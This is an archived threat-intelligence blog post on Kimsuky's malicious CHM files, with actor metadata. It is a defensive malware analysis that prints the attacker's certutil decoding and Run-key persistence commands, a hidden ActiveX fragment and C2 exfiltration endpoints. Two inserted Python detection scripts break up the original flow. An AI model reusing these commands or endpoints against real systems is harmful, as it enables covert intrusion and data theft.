{
	"id": "e07dfdd4-a684-4283-9dcd-82766aa7b79a",
	"created_at": "2026-04-06T00:21:45.077305Z",
	"updated_at": "2026-04-10T13:12:44.239873Z",
	"deleted_at": null,
	"sha1_hash": "02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2",
	"title": "The Updated APT Playbook: Tales from the Kimsuky threat actor group | Rapid7 Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4990496,
	"plain_text": "The Updated APT Playbook: Tales from the Kimsuky threat actor\r\ngroup | Rapid7 Blog\r\nBy Rapid7\r\nPublished: 2024-03-20 · Archived: 2026-04-05 14:55:55 UTC\r\nCo-authors are Christiaan Beek and Raj Samani\r\nWithin Rapid7 Labs we continually track and monitor threat groups. This is one of our key areas of focus as we\r\nwork to ensure that our ability to protect customers remains constant. As part of this process, we routinely identify\r\nevolving tactics from threat groups in what is an unceasing game of cat and mouse.\r\nOur team recently ran across some interesting activity that we believe is the work of the Kimsuky threat actor\r\ngroup, also known as Black Banshee or Thallium. Originating from North Korea and active since at least 2012,\r\nKimsuky focuses primarily on intelligence gathering. The group is known to have targeted South Korean\r\ngovernment entities, individuals associated with the Korean peninsula's unification process, and global experts in\r\nvarious fields relevant to the regime's interests. In recent years, Kimsuky’s activity has also expanded across the\r\nAPAC region to impact Japan, Vietnam, Thailand, etc.\r\nThrough our research, we saw an updated playbook that underscores Kimsuky’s efforts to bypass modern security\r\nmeasures. 
Their evolution in tactics, techniques, and procedures (TTPs) underscores the dynamic nature of cyber\r\nespionage and the continuous arms race between threat actors and defenders.\r\nIn this blog we detail new techniques that we have observed this actor group use over recent months. We\r\nbelieve that sharing these evolving techniques gives defenders the latest insight into the measures required to\r\nprotect their assets.\r\nAnatomy of the Attack\r\nLet's begin by highlighting where we started our analysis of Kimsuky and how, the more we investigated, the\r\nmore we discovered, to the point where we believe we observed a new wave of attacks by this actor.\r\nOnce a target has been identified, we would normally expect a reconnaissance phase whose aim is to find a way\r\ninto the target. Because Kimsuky's objective is intelligence gathering, the intrusion must remain undetected;\r\nconsequently, it is designed not to trigger alerts.\r\nOver the years we have observed this group's delivery methods change: first weaponized Office documents, then\r\nISO files, and beginning last year the abuse of shortcut (LNK) files. By disguising LNK files as benign\r\ndocuments, attackers trick users into executing them. PowerShell commands, or even complete binaries, are\r\nembedded in the LNK file where the end user does not see them at the surface.\r\nOur latest findings are observations that we believe show Kimsuky using CHM files, delivered in several ways\r\ninside an ISO, VHD, ZIP or RAR container. 
The reason they would use this approach is that such\r\ncontainers can pass the first line of defense: mail and web gateways that would block a bare script or executable\r\noften let an archive or disk image through, and the CHM file inside is then opened by the user.\r\nhttps://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/\r\nPage 1 of 14\n\nCHM files, or Compiled HTML Help files, are a proprietary format for online help files developed by Microsoft.\r\nThey contain a collection of HTML pages together with a table of contents, an index, and full-text search\r\ncapability. Essentially, CHM files display help documentation in a structured, navigable format. They are\r\ncompiled with the Microsoft HTML Help Workshop and can include text, images, and hyperlinks, similar to web\r\npages, but are packaged as a single compressed file with a .chm extension.\r\nWhile originally designed for help documentation, CHM files have also been abused for malicious purposes such\r\nas distributing malware: the embedded HTML is rendered by hh.exe, the HTML Help viewer, which runs script and\r\nActiveX controls, including the HTML Help \"shortcut\" object that launches arbitrary commands. A CHM file is a\r\nsmall archive (the ITSS container format with LZX compression, not ZIP) whose contents can be extracted for\r\nanalysis with 7-Zip or a libchm-based tool such as extract_chmLib.\r\nThe first scenario in our analysis can be visualized as follows:\r\nThe Nuclear Lure\r\nWhile tracking activity, we first discovered a CHM file that caught our attention.\r\nHash Value\r\nMD5 364d4fdf430477222fe854b3cd5b6d40\r\nSHA1 b5224224fdbabdea53a91a96e9f816c6f9a8708c\r\nSHA256 c62677543eeb50e0def44fc75009a7748cdbedd0a3ccf62f50d7f219f6a5aa05\r\nAnalyzing this file in a controlled environment, we observe that the CHM file contains the following files and\r\nstructure:\r\nThe language of the filenames is Korean. 
With the help of translation software, here are the file names:\r\nNorth Korea's nuclear strategy revealed in 'Legalization of Nuclear Forces'.html\r\nIncomplete.html\r\nFactors and types of North Korea's use of nuclear weapons.html\r\nNorth Korean nuclear crisis escalation model and determinants of nuclear use.html\r\nIntroduction.html\r\nPrevious research review.html\r\nResearch background and purpose.html\r\nThese HTML files link to the main HTML file 'home.html', to which we will return later.\r\nEach file type has its own characteristics, so from a file-forensics perspective let's look at the header of the\r\nfile, the fixed ITSF header that starts every CHM:\r\nOffset Raw bytes Value Comment\r\n0x00 0x49545346 ITSF File header ID (magic) for CHM files\r\n0x04 0x03 3 Version number\r\n... ... ... (fields skipped)\r\n0x14 0x1204 0x0412 Windows language ID (LCID); the dump reads 12 04 because the field is little-endian\r\nThe language ID 0x0412 is \"Korean - Korea\". The HTML Help compiler writes the project language, which defaults\r\nto the locale of the system it runs on, so this CHM file was most likely compiled on a Windows system using the\r\nKorean language.\r\nWhen the CHM file is opened, it displays the following:\r\nThe page in the right pane is the 'home.html' file. This page contains an interesting piece of code:\r\nThe code snippet uses HTML and the HTML Help ActiveX control to execute arbitrary commands on a Windows\r\nmachine, typically for malicious purposes. The value assigned to the 'Button' parameter contains a command line\r\nwith Base64 in it as a further obfuscation layer, followed by a living-off-the-land technique (certutil and reg.exe)\r\nthat decodes the payload and creates persistence on the victim's system so the content runs again.\r\nLet's break it up and understand what the actor is doing:\r\n1. 
Base64-encoded VBScript dropped via the Windows command shell (T1059.003; the decoded payload is Visual\r\nBasic, T1059.005):\r\necho T24gRXJyb3IgUmVzdW1lIE5leHQ...: This part echoes a Base64-encoded string into a file. The\r\nstring, when decoded, is VBScript code intended to run on the victim's machine; the visible prefix alone decodes\r\nto \"On Error Resume Next\". The decoded Base64 value is:\r\n2. Saving to a .dat File:\r\n\u003e\"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat\": The echoed Base64 string is redirected into a .dat\r\nfile in the current user's Links directory. The filename looks random, but its first 16 characters are themselves\r\nBase64: MXFhejJ3c3gzZWRj decodes to the keyboard-walk string 1qaz2wsx3edc.\r\n3. Decoding the .dat File:\r\nstart /MIN certutil -decode \"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat\"\r\n\"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs\": This uses certutil, a legitimate Windows tool, to decode\r\nthe Base64 .dat file back into a .vbs (VBScript) file. The /MIN switch belongs to start and launches the process in\r\na minimized window to reduce suspicion.\r\n4. Persistence via Registry Modification (T1547.001):\r\nstart /MIN REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Document /t\r\nREG_SZ /d \"%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs\" /f: This adds a value named Document under\r\nthe Run key of the current user (HKCU is HKEY_CURRENT_USER). Windows reads this key to determine which\r\nprograms start automatically at logon, so the decoded VBScript runs every time the user logs in, achieving\r\npersistence on the infected system.\r\nBut what is downloaded from the URL, decoded and written to that VBS file? 
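Stepping back to the file header for a moment: the magic, version and language ID in the header table above can be read straight off the first 0x38 bytes of any CHM. The Python script below is an added example written for this page, not Rapid7's tooling; it parses a constructed minimal ITSF header rather than bytes from the sample, and its LCID table is a small subset of the Windows language-ID list.\r\n
```python
import struct

# Windows language IDs (LCIDs) relevant here; a small subset of the full list.
LCID_NAMES = {
    0x0409: 'English - United States',
    0x0411: 'Japanese - Japan',
    0x0412: 'Korean - Korea',
    0x0419: 'Russian - Russia',
    0x0804: 'Chinese - China',
}

ITSF_MAGIC = b'ITSF'
ITSF_FIXED_LEN = 0x38  # magic through the second GUID


def parse_itsf_header(data):
    # Fixed ITSF header that starts every CHM file:
    #   0x00 magic 'ITSF'      0x04 version (3 for CHM)   0x08 header length
    #   0x0C unknown (1)       0x10 timestamp             0x14 Windows LCID
    #   0x18 GUID              0x28 GUID
    # Integers are little-endian, which is why a hex dump shows the Korean
    # language ID 0x0412 as the byte sequence 12 04 00 00.
    if len(data) < ITSF_FIXED_LEN:
        raise ValueError('too short for an ITSF header')
    magic, version, header_len, _, timestamp, lcid = struct.unpack_from(
        '<4sIIIII', data, 0)
    if magic != ITSF_MAGIC:
        raise ValueError('not a CHM file: magic %r' % magic)
    return {
        'version': version,
        'header_length': header_len,
        'timestamp': timestamp,
        'lcid': lcid,
        'language': LCID_NAMES.get(lcid, 'unknown LCID 0x%04x' % lcid),
        'raw_lcid_bytes': data[0x14:0x18].hex(),
    }


def build_sample_header(lcid):
    # Constructed input, not bytes from the real sample: a minimal header with
    # version 3, a plausible header length (0x60) and two zeroed GUIDs.
    return struct.pack('<4sIIIII', ITSF_MAGIC, 3, 0x60, 1, 0, lcid) + bytes(32)


def inspect_chm(path):
    # Read only the fixed header from disk; enough to triage a suspect file.
    with open(path, 'rb') as fh:
        return parse_itsf_header(fh.read(ITSF_FIXED_LEN))


if __name__ == '__main__':
    print(parse_itsf_header(build_sample_header(0x0412)))
```
Pointed at a real file, inspect_chm(path) returns the same dictionary. A magic other than ITSF or a version other than 3 means the file is not a CHM regardless of its extension, and an LCID that does not match the language of the lure is itself worth noting during triage.\r\n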
To answer that question: the URL of the command and\r\ncontrol (C2) server hosts an HTML page that contains VBS code:\r\nAnalyzing the code, it does several things on the victim's machine:\r\nThe function 'SyInf()' collects basic system information using WMI (Windows Management Instrumentation) and\r\nconstructs a string with all these details. What is gathered:\r\nComputer name, owner, manufacturer, model, system type.\r\nOperating system details, version, build number, total visible memory.\r\nProcessor details, including caption and clock speed.\r\nOther functions in the code collect the running processes on the system and recent Word files, and list the\r\ndirectories and files of specific folders. In our case, the actor was interested in the content of the Downloads\r\nfolder.\r\nOnce the requested information has been gathered, it is Base64-encoded, stored in the file 'info.txt' and\r\nexfiltrated to the remote server:\r\nui = \"00701111.000webhostapp.com/wp-extra\"\r\nOnce the information is sent, the C2 responds with the following message:\r\nThis C2 server is still active: we have seen activity since September 2023 and also observed activity in 2024.\r\nNew Campaign Discovered\r\nPivoting on some of the unique strings in the 'stealer code' and hunting for more CHM files, we discovered more\r\nfiles, some going back to H2 2023 and some from 2024.\r\nIn VirusTotal we discovered the following file:\r\nHash Value\r\nMD5 71db2ae9c36403cec1fd38864d64f239\r\nSHA1 5c7b2705155023e6e438399d895d30bf924e0547\r\nSHA256 e8000ddfddbe120b5f2fb3677abbad901615d1abd01a0de204fade5d2dd5ad0d\r\nThe file is a VBS script, and it contains code similar to the information-gathering script described above. 
Many components are the same, with small differences in the type of data gathered. The biggest difference,\r\nwhich makes sense, is a different C2 server. Below is the full URL that the VBS script concatenates at run time:\r\nhxxp://gosiweb.gosiclass[.]com/m/gnu/convert/html/com/list.php?query=6\r\nThe modus operandi and the reuse of code and tools show that the threat actor is actively using and refining its\r\ntechniques and tactics to gather intelligence from victims.\r\nStill More? Yes, Another Approach Discovered\r\nUsing the characteristics of the CHM files discovered earlier, we developed internal YARA hunting rules, which\r\nled us to the following CHM file:\r\nHash Value\r\nMD5 f35b05779e9538cec363ca37ab38e287\r\nSHA1 d4fa57f9c9e35222a8cacddc79055c1d76907fb9\r\nSHA256 da79eea1198a1a10e2ffd50fd949521632d8f252fb1aadb57a45218482b9fd89\r\nIn this particular case, multiple .bat files and VBS scripts are present:\r\nIn similar fashion, an HTML file in the directory contains hidden code. The fragment below is assembled inside a\r\nJavaScript string (hence the '+d+' concatenation), and its Item1 parameter invokes hh.exe with -decompile so\r\nthat the CHM's own contents are written to C:\\Users\\Public\\Libraries:\r\nstyle=\"visibility:hidden;\"\u003e\u003cparam name=\"Command\" value=\"ShortCut\"\u003e\u003cparam name=\"Button\"\r\nvalue=\"Bitmap:shortcut\"\u003e\u003cparam name=\"Item1\" value=\",hh,-decompile C:\\\\Users\\\\Public\\\\Libraries '+d+'\r\nThe background PNG file shows (translated) the following information:\r\nOnce the CHM file is executed, it drops all files in the 
C:\\Users\\Public\\Libraries directory and starts running. It\r\nbegins by creating a scheduled task for persistence with the \"\\2034923.bat\" file:\r\nThe VBS script creates a service, and then the other .bat files are executed, each with a different function.\r\nThe \"9583423.bat\" script gathers information from the system and stores it in text files:\r\nOnce the information has been gathered, the '1295049.bat' script is called. It contains the PowerShell code that\r\nsets up the connection to the C2 server with the right path, Base64-encodes the stream, and transfers it:\r\nCombining the code from the previous .bat file with this code, the path to the C2 is constructed:\r\nhxxps://niscarea[.]com/in.php?cn=[base64]\u0026fn=[DateTime]\r\nThe gathered files containing information about the system are Base64-encoded, zipped and sent to the C2.\r\nAfter sending, the files are deleted from the local system.\r\nThe sys.txt file contains information about the victim's system such as OS, CPU architecture, etc. Here is a\r\nshort example of the content:\r\nThe overall flow of this attack can be simplified in this visualization:\r\nAttack Prevalence\r\nSince this is an active campaign, the prevalence described here reflects the time of writing. 
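Before turning to prevalence, it is worth collapsing both chains above into the handful of host behaviours a detection engineer can key on: hh.exe spawning any child process, certutil -decode, reg.exe writing a Run value that points at a script, hh.exe -decompile, and schtasks /create. The script below is an added example written for this page, not Rapid7's detection content; the process-creation events it scans are constructed to mirror the chains described above (PIDs, paths and the short Base64 payload are invented), and echoed_payload shows how to recover what the actor writes to disk in the echo stage before certutil ever touches it.\r\n
```python
import base64
import binascii
import ntpath
import re

# Constructed process-creation events modelled on the two CHM chains above
# (hh.exe -> cmd.exe -> certutil/reg.exe, and hh.exe -decompile -> .bat ->
# schtasks). This is not real telemetry: PIDs, paths and the short Base64
# payload (it decodes to the VBScript line 'On Error Resume Next') are invented.
SAMPLE_EVENTS = [
    {'pid': 1200, 'parent': 'C:\\Windows\\hh.exe',
     'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'cmd.exe /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ= >%USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat'},
    {'pid': 1201, 'parent': 'C:\\Windows\\System32\\cmd.exe',
     'image': 'C:\\Windows\\System32\\certutil.exe',
     'cmdline': 'certutil -decode %USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.dat %USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs'},
    {'pid': 1202, 'parent': 'C:\\Windows\\System32\\cmd.exe',
     'image': 'C:\\Windows\\System32\\reg.exe',
     'cmdline': 'REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v Document /t REG_SZ /d %USERPROFILE%\\Links\\MXFhejJ3c3gzZWRjA.vbs /f'},
    {'pid': 1300, 'parent': 'C:\\Windows\\hh.exe',
     'image': 'C:\\Windows\\hh.exe',
     'cmdline': 'hh -decompile C:\\Users\\Public\\Libraries C:\\Users\\victim\\Downloads\\lure.chm'},
    {'pid': 1301, 'parent': 'C:\\Windows\\System32\\cmd.exe',
     'image': 'C:\\Windows\\System32\\schtasks.exe',
     'cmdline': 'schtasks /create /tn Office /tr C:\\Users\\Public\\Libraries\\2034923.bat /sc minute /mo 10 /f'},
    {'pid': 1400, 'parent': 'C:\\Windows\\explorer.exe',   # benign: no -decode
     'image': 'C:\\Windows\\System32\\certutil.exe',
     'cmdline': 'certutil -verify C:\\temp\\vendor.cer'},
]

SCRIPT_EXT = ('.vbs', '.vbe', '.js', '.jse', '.bat', '.cmd', '.ps1', '.hta')


def echoed_payload(cmdline):
    # Take the token after 'echo' and try to Base64-decode it: this is the
    # stage where the actor writes the still-encoded VBScript to disk.
    m = re.search('(?i)echo +([A-Za-z0-9+/=]{16,})', cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None


def run_key_target(cmd):
    # Value data of a 'reg add ... /d <data> [/f]' command, or empty string.
    if ' /d ' not in cmd:
        return ''
    return cmd.split(' /d ', 1)[1].split(' /f')[0].strip()


def detect(ev):
    # Rule names that fire for one process-creation event.
    parent = ntpath.basename(ev['parent']).lower()
    image = ntpath.basename(ev['image']).lower()
    cmd = ev['cmdline'].lower()
    hits = []
    if parent == 'hh.exe':
        hits.append('hh.exe spawns child process')
    if image == 'certutil.exe' and '-decode' in cmd.split():
        hits.append('certutil -decode (T1140)')
    if image == 'reg.exe' and ' add ' in cmd and '\\currentversion\\run' in cmd:
        hits.append('run key added by reg.exe (T1547.001)')
        if run_key_target(cmd).endswith(SCRIPT_EXT):
            hits.append('script registered in run key')
    if image == 'hh.exe' and '-decompile' in cmd:
        hits.append('hh.exe -decompile drops CHM contents')
    if image == 'schtasks.exe' and '/create' in cmd:
        hits.append('scheduled task created (T1053.005)')
    if echoed_payload(ev['cmdline']) is not None:
        hits.append('base64 payload echoed to disk')
    return hits


def scan(events):
    # pid -> rule names, for every event that fired at least one rule.
    findings = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            findings[ev['pid']] = hits
    return findings


if __name__ == '__main__':
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, rules)
```
Running it prints the PIDs that fired together with the matching rule names; the benign certutil -verify event stays silent. The hh.exe-spawns-child rule is deliberately broad: in most environments hh.exe should never spawn a process at all, so the false-positive cost of alerting on any child is low, and the certutil and reg.exe rules then confirm the specific chain.\r\n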
Rapid7 Labs telemetry\r\nnevertheless allows us to confirm that we have identified targeted attacks against entities based in South Korea.\r\nMoreover, applying our attribution approach (overlap in code and tactics), we attribute this campaign with\r\nmoderate confidence* to the Kimsuky group.\r\nAll IoCs are available freely within our Rapid7 Labs repository here.\r\nRapid7 Customers\r\nInsightIDR and Managed Detection and Response (MDR) customers have existing detection coverage through\r\nRapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable\r\nhosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list\r\nof detections deployed and alerting on activity related to these techniques and research:\r\nPersistence - Run Key Added by Reg.exe\r\nSuspicious Process - HH.exe Spawns Child Process\r\nSuspicious Process - CHM File Runs CMD.exe to Run Certutil\r\nPersistence - vbs Script Added to Registry Run Key\r\n*In threat research terms, \"moderate confidence\" means that we have a significant amount of evidence that the\r\nactivity we are observing is similar to what we have observed from a specific group or actor in the past; however,\r\nthere is always a chance someone is mimicking behavior. Hence, we use \"moderate\" instead of \"high\"\r\nconfidence.\r\nSource: https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/"
	],
	"report_names": [
		"the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434905,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.pdf",
		"text": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.txt",
		"img": "https://archive.orkl.eu/02b2b5a5ba770ab4e41775d8be3ab57aae0bafc2.jpg"
	}
}